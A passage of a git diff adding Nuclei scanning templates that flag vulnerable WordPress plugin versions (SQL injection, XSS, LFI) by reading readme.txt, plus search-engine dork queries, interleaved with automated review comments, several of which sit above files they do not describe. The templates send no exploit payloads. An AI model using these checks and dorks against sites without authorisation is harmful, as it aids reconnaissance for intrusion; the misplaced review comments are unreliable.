+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "if-menu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.19.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8679.yaml b/poc/cve/CVE-2024-8679.yaml
new file mode 100644
index 0000000000..fa30b89384
--- /dev/null
+++ b/poc/cve/CVE-2024-8679.yaml
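Review bot: `severity: high` and the `high` tag contradict `cvss-score: 5.3` with vector `.../PR:N/UI:N/S:U/C:N/I:L/A:N`, which is CVSS v3.1 Medium; unauthenticated modification of a license key is an integrity-only impact, and `medium` fits both the score and the vector. The `description` also reads "to modify delete or modify the license key" — presumably "to modify or delete the license key" was meant. As elsewhere in this commit the `actions` function is never called; a match only means the readme `Stable tag` is `<= 0.19.1`, which `description` should state.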
@@ -0,0 +1,59 @@
+id: CVE-2024-8679
+
+info:
+ name: >
+ Library Management System <= 3.0.0 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Library Management System – Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the ‘value' parameter of the owt_lib_handler AJAX action in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 6.8
+ cve-id: CVE-2024-8679
+ metadata:
+ fofa-query: "wp-content/plugins/library-management-system/"
+ google-query: inurl:"/wp-content/plugins/library-management-system/"
+ shodan-query: 'vuln:CVE-2024-8679'
+ tags: cve,wordpress,wp-plugin,library-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/library-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "library-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
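Review bot: `severity: low` (and the `low` tag) disagrees with `cvss-score: 6.8`, which is in the CVSS v3.1 Medium band; the `PR:H/.../S:C/C:H` vector is what produces that score. If the intent was to downgrade because an Administrator-only SQLi has little practical value on WordPress (an administrator can typically already run arbitrary PHP via the plugin/theme editor unless file editing is disabled), say so in `description` rather than leaving the two fields inconsistent; otherwise set `severity: medium`. `poc/other/library-management-system.yaml` in this commit repeats the same `<= 3.0.0` readme check with empty classification, so hosts will be double-reported.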
diff --git a/poc/other/beautiful-taxonomy-filters.yaml b/poc/other/beautiful-taxonomy-filters.yaml
new file mode 100644
index 0000000000..9b124bb927
--- /dev/null
+++ b/poc/other/beautiful-taxonomy-filters.yaml
@@ -0,0 +1,59 @@
+id: beautiful-taxonomy-filters
+
+info:
+ name: >
+ Beautiful Taxonomy Filters <= 2.4.3 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/beautiful-taxonomy-filters/"
+ google-query: inurl:"/wp-content/plugins/beautiful-taxonomy-filters/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,beautiful-taxonomy-filters,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/beautiful-taxonomy-filters/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "beautiful-taxonomy-filters"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
diff --git a/poc/other/cf7-mollie.yaml b/poc/other/cf7-mollie.yaml
new file mode 100644
index 0000000000..204e4a17e7
--- /dev/null
+++ b/poc/other/cf7-mollie.yaml
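Review bot: `classification` is committed with bare `cvss-metrics:`, `cvss-score:` and `cve-id:` keys, which YAML loads as null, `description: >` is an empty scalar, `shodan-query: 'vuln:'` is an unfinished filter, and `tags` still begins with `cve` although no id is given. The same detection with all of those fields populated is `poc/cve/CVE-2024-12270.yaml` in this commit (same Wordfence id 75c9c106-…, same `<= 2.4.3` readme check), so this file is a duplicate: either remove it, or fill `cve-id: CVE-2024-12270`, the score/vector and the description from the CVE template. As it stands a vulnerable host is reported twice, once with no severity justification at all.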
@@ -0,0 +1,59 @@
+id: cf7-mollie
+
+info:
+ name: >
+ Mollie for Contact Form 7 <= 5.0.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cf7-mollie/"
+ google-query: inurl:"/wp-content/plugins/cf7-mollie/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cf7-mollie,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cf7-mollie/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cf7-mollie"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.0')
\ No newline at end of file
diff --git a/poc/other/clicksend-lead-capture-form.yaml b/poc/other/clicksend-lead-capture-form.yaml
new file mode 100644
index 0000000000..24d74d522d
--- /dev/null
+++ b/poc/other/clicksend-lead-capture-form.yaml
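Review bot: This file repeats `poc/cve/CVE-2024-12165.yaml` from the same commit — identical Wordfence id a5a21b3a-…, identical `cf7-mollie` readme request and `<= 5.0.0` comparison — but with `description: >` empty, `cvss-metrics:`/`cvss-score:`/`cve-id:` left as null values, `shodan-query: 'vuln:'` incomplete, and a `cve` tag that nothing backs. Keeping both means every affected host is reported twice and the second report carries no classification a triager can use. Drop this copy, or at minimum set `cve-id: CVE-2024-12165` and copy the score, vector and description across so the two cannot drift apart.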
@@ -0,0 +1,59 @@
+id: clicksend-lead-capture-form
+
+info:
+ name: >
+ SMS for Lead Capture Forms <= 1.1.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c68bb6-77a2-4232-923a-37f2c0327743?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clicksend-lead-capture-form/"
+ google-query: inurl:"/wp-content/plugins/clicksend-lead-capture-form/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clicksend-lead-capture-form,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clicksend-lead-capture-form/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clicksend-lead-capture-form"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/other/comfino-payment-gateway.yaml b/poc/other/comfino-payment-gateway.yaml
new file mode 100644
index 0000000000..2ce4fa49f1
--- /dev/null
+++ b/poc/other/comfino-payment-gateway.yaml
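Review bot: `description: >` is empty, `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys that load as null, `shodan-query: 'vuln:'` names no CVE, and `tags` claims `cve` without one — a consumer that filters or sorts on `cve-id` or `cvss-score` will hit null here. Either populate the classification from the Wordfence reference on the line above it, or drop the `cve` tag and the empty keys so the template is honestly an "other" fingerprint. If a CVE has been assigned, the file should also move under `poc/cve/` and be named after it, like the other templates in this commit.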
@@ -0,0 +1,59 @@
+id: comfino-payment-gateway
+
+info:
+ name: >
+ Comfino Payment Gateway <= 4.1.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/006945a3-5f54-4bb8-9522-c832d59624a0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/comfino-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/comfino-payment-gateway/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,comfino-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/comfino-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "comfino-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.1')
\ No newline at end of file
diff --git a/poc/other/edoc-easy-tables.yaml b/poc/other/edoc-easy-tables.yaml
new file mode 100644
index 0000000000..545f44e7f8
--- /dev/null
+++ b/poc/other/edoc-easy-tables.yaml
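Review bot: The `classification` block is a shell — `cvss-metrics:`, `cvss-score:` and `cve-id:` carry no values (null once parsed), `description: >` is empty and `shodan-query: 'vuln:'` is cut off — yet `severity: medium` and a `cve` tag are asserted without the data that would justify them. For a payment-gateway plugin an unsubstantiated "medium" is easy to misread as a confirmed XSS; either fill the fields from the Wordfence entry referenced two lines above or remove the `cve` tag and the empty keys. The detection itself is a readme `Stable tag <= 4.1.1` check only, which the (currently empty) description should say.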
@@ -0,0 +1,59 @@
+id: edoc-easy-tables
+
+info:
+ name: >
+ eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/edoc-easy-tables/"
+ google-query: inurl:"/wp-content/plugins/edoc-easy-tables/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,edoc-easy-tables,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/edoc-easy-tables/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "edoc-easy-tables"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
diff --git a/poc/other/gl-ar300m_firmware.yaml b/poc/other/gl-ar300m_firmware.yaml
new file mode 100644
index 0000000000..3d387bccf3
--- /dev/null
+++ b/poc/other/gl-ar300m_firmware.yaml
@@ -0,0 +1,20 @@
+id: gl-ar300m_firmware
+info:
+ name: gl-ar300m_firmware
+ author: cn-kali-team
+ tags: detect,tech,gl-ar300m_firmware
+ severity: info
+ metadata:
+ product: gl-ar300m_firmware
+ shodan-query:
+ - title:"gl.inet admin panel"
+ vendor: gl-inet
+ verified: true
+http:
+- method: GET
+ path:
+ - '{{BaseURL}}/'
+ matchers:
+ - type: regex
+ regex:
+ - (?mi)]*>gl.inet admin panel.*?
diff --git a/poc/other/library-management-system.yaml b/poc/other/library-management-system.yaml
new file mode 100644
index 0000000000..ea48142651
--- /dev/null
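Review bot: The `name` promises "Cross-Site Request Forgery to SQL Injection", but `description: >` is empty and `cvss-metrics:`, `cvss-score:` and `cve-id:` are null, so nothing in the file tells a reader what `severity: medium` rests on; `shodan-query: 'vuln:'` and the `cve` tag are likewise placeholders. A CSRF can never be confirmed by the readme `Stable tag <= 1.29` check this template performs, so the description should at least say the match is version-based and where the chain starts. Fill the classification from the Wordfence reference or drop the `cve` tag and empty keys.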
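Review bot: The single matcher's regex `(?mi)]*>gl.inet admin panel.*?` looks truncated: the leading `]*>` reads like the tail of a `<title[^>]*>` prefix and the trailing `.*?` has nothing after it to stop on, so the opening tag and a closing `</title>` appear to have been lost — possibly only in how this page renders `<…>`, in which case the committed file is fine and this is worth a quick look at the raw file. If the file really contains this string it still compiles (RE2 treats a stray `]` as a literal) but effectively matches `>gl.inet admin panel` anywhere in the body, with the unescaped `.` in `gl.inet` acting as a wildcard; the intended form is presumably a full title match, and it should be quoted so YAML never misreads `[`/`>` in it. Consider also a `status: 200` matcher with `matchers-condition: and`, as the other detect templates in this commit rely on a body match alone.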
+++ b/poc/other/library-management-system.yaml
@@ -0,0 +1,59 @@
+id: library-management-system
+
+info:
+ name: >
+ Library Management System <= 3.0.0 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/library-management-system/"
+ google-query: inurl:"/wp-content/plugins/library-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,library-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/library-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "library-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
diff --git a/poc/other/multi-gallery.yaml b/poc/other/multi-gallery.yaml
new file mode 100644
index 0000000000..849dfa27c8
--- /dev/null
+++ b/poc/other/multi-gallery.yaml
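Review bot: This is a second copy of `poc/cve/CVE-2024-8679.yaml` from the same commit — same Wordfence id ee792903-…, same `library-management-system` readme request, same `<= 3.0.0` comparison — with `description: >` empty, `cvss-metrics:`/`cvss-score:`/`cve-id:` null, `shodan-query: 'vuln:'` unfinished and a `cve` tag nothing supports. Running both produces two findings per host, one of which has no classification to triage against. Delete this copy, or set `cve-id: CVE-2024-8679` and carry the score, vector and description over so the two stay in step.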
@@ -0,0 +1,59 @@
+id: multi-gallery
+
+info:
+ name: >
+ Gallery <= 1.3 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/778f7d9b-6376-4026-a291-1fedeabe8c99?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/multi-gallery/"
+ google-query: inurl:"/wp-content/plugins/multi-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,multi-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multi-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multi-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/other/smoove-elementor.yaml b/poc/other/smoove-elementor.yaml
new file mode 100644
index 0000000000..93015c9446
--- /dev/null
+++ b/poc/other/smoove-elementor.yaml
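Review bot: The `word` matcher requires the literal `multi-gallery` in the readme body while the plugin's display name in `name` is just "Gallery"; unless the readme contains the directory slug in a URL or tag line, the `and` condition fails and the host is never reported, so a `case-insensitive: true` match on the readme title line would be safer. The rest of the metadata is a placeholder — `description: >` empty, `cvss-metrics:`/`cvss-score:`/`cve-id:` null, `shodan-query: 'vuln:'` truncated, `cve` tag without an id — which for a PHP Object Injection finding leaves a triager with nothing but the Wordfence URL. Populate the classification or drop the `cve` tag and the empty keys.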
@@ -0,0 +1,59 @@
+id: smoove-elementor
+
+info:
+ name: >
+ Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smoove-elementor/"
+ google-query: inurl:"/wp-content/plugins/smoove-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smoove-elementor,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smoove-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.0')
\ No newline at end of file
diff --git a/poc/other/swift_performance_lite.yaml b/poc/other/swift_performance_lite.yaml
new file mode 100644
index 0000000000..5ee61da7bf
--- /dev/null
+++ b/poc/other/swift_performance_lite.yaml
@@ -0,0 +1,20 @@
+id: swift_performance_lite
+info:
+ name: swift_performance_lite
+ author: cn-kali-team
+ tags: detect,tech,swift_performance_lite
+ severity: info
+ metadata:
+ fofa-query:
+ - body="/wp-content/plugins/swift-performance-lite"
+ product: swift_performance_lite
+ vendor: swiftperformance
+ verified: true
+http:
+- method: GET
+ path:
+ - '{{BaseURL}}/'
+ matchers:
+ - type: word
+ words:
+ - /wp-content/plugins/swift-performance-lite
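Review bot: A `severity: medium` "Reflected Cross-Site Scripting" finding is raised here purely from `compare_versions(version, '<= 4.1.0')` on the readme `Stable tag`, with `description` left empty, so a consumer of the results cannot tell a version inference from a verified XSS. Add a short description such as `Version-based detection via readme.txt Stable tag; the reflected XSS is not exercised by this template.` so the result is triaged as potentially vulnerable rather than confirmed. Note also that `([0-9.]+)` captures nothing for a `Stable tag: trunk` readme, in which case, as far as I can tell, the DSL matcher fails under `matchers-condition: and` and the install is simply not reported.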
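Review bot: The word matcher on `/wp-content/plugins/swift-performance-lite` runs against the homepage response with no `part:` and no anchoring, so any page that merely mentions that path in text — a post about the plugin, a comment, a pasted URL — is reported as running it. Anchoring on an enqueued asset is more reliable, e.g. `- type: regex` with `part: body` and `regex: - "wp-content/plugins/swift-performance-lite/[^\"']+\\.(css|js)"`. `verified: true` in `metadata` is an assertion this template cannot back up by itself; keep it only if the check was run against a known install.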
diff --git a/poc/other/zooom.yaml b/poc/other/zooom.yaml
new file mode 100644
index 0000000000..f10c38a319
--- /dev/null
+++ b/poc/other/zooom.yaml
@@ -0,0 +1,59 @@
+id: zooom
+
+info:
+ name: >
+ Zooom <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd15878-a290-4613-83d9-011d60bb0233?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/zooom/"
+ google-query: inurl:"/wp-content/plugins/zooom/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,zooom,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zooom/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zooom"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml b/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
new file mode 100644
index 0000000000..52fc1e4f8c
--- /dev/null
+++ b/poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
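Review bot: The word matcher `- "zooom"` is case-sensitive (no `case-insensitive: true` is set), while the version regex is deliberately `(?mi)` case-insensitive; a readme that only writes the name as `Zooom` — as the `name` field itself does — fails the `and` condition and the install is silently skipped even with a Stable tag `<= 1.1.0`. Either add `case-insensitive: true` under the word matcher or anchor on a readme token that is always present, e.g. `words: - "Stable tag:"`. I can't see the plugin's readme from this hunk, so confirm against a live install before relying on the current matcher.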
@@ -0,0 +1,59 @@
+id: wp-health-13e7f9c38c97fef1a7e5dbdde401c273
+
+info:
+ name: >
+ WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-health/"
+ google-query: inurl:"/wp-content/plugins/wp-health/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-health,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-health"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.17.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml b/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
new file mode 100644
index 0000000000..52fc1e4f8c
--- /dev/null
+++ b/poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
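Review bot: This Local File Inclusion check is filed under `poc/sql/`, and the next hunk adds a byte-identical copy (same `id`, same blob `52fc1e4f8c`) under `poc/wordpress/`, so the same `id: wp-health-13e7f9c38c97fef1a7e5dbdde401c273` now exists twice in the template set. As far as I recall nuclei warns on duplicate template ids and loads only one of them, and anyone selecting the `sql` directory for injection checks will get an LFI template instead. Keep the `poc/wordpress/` copy and drop this file; if a second location is really wanted, give it a distinct `id`.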
@@ -0,0 +1,59 @@
+id: wp-health-13e7f9c38c97fef1a7e5dbdde401c273
+
+info:
+ name: >
+ WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-health/"
+ google-query: inurl:"/wp-content/plugins/wp-health/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-health,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-health"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.17.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-mini-program.yaml b/poc/wordpress/wp-mini-program.yaml
new file mode 100644
index 0000000000..c987d75909
--- /dev/null
+++ b/poc/wordpress/wp-mini-program.yaml
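Review bot: A `severity: critical` "Unauthenticated Local File Inclusion" is emitted on nothing more than `compare_versions(version, '<= 2.17.0')` against the readme `Stable tag`, with `description` empty and `cvss-metrics:`/`cvss-score:`/`cve-id:` left null, so a site whose readme.txt is stale or whose build was patched without a readme bump is reported at the same level as a live LFI. Add a description stating that the check is version-only and the inclusion is not exercised, e.g. `Flags WP Umbrella <= 2.17.0 from the readme.txt Stable tag; the LFI itself is not requested.`, and fill the classification fields from the Wordfence reference so the `critical` rating has a CVSS vector behind it. The `shodan-query: 'vuln:'` placeholder should be removed.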
@@ -0,0 +1,59 @@
+id: wp-mini-program
+
+info:
+ name: >
+ Mini Program API <= 1.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0b9499b-3017-46a6-80d5-104d203b77f0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mini-program/"
+ google-query: inurl:"/wp-content/plugins/wp-mini-program/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-mini-program,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mini-program/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mini-program"
+ part: body
+
+ - type: dsl
+ dsl:
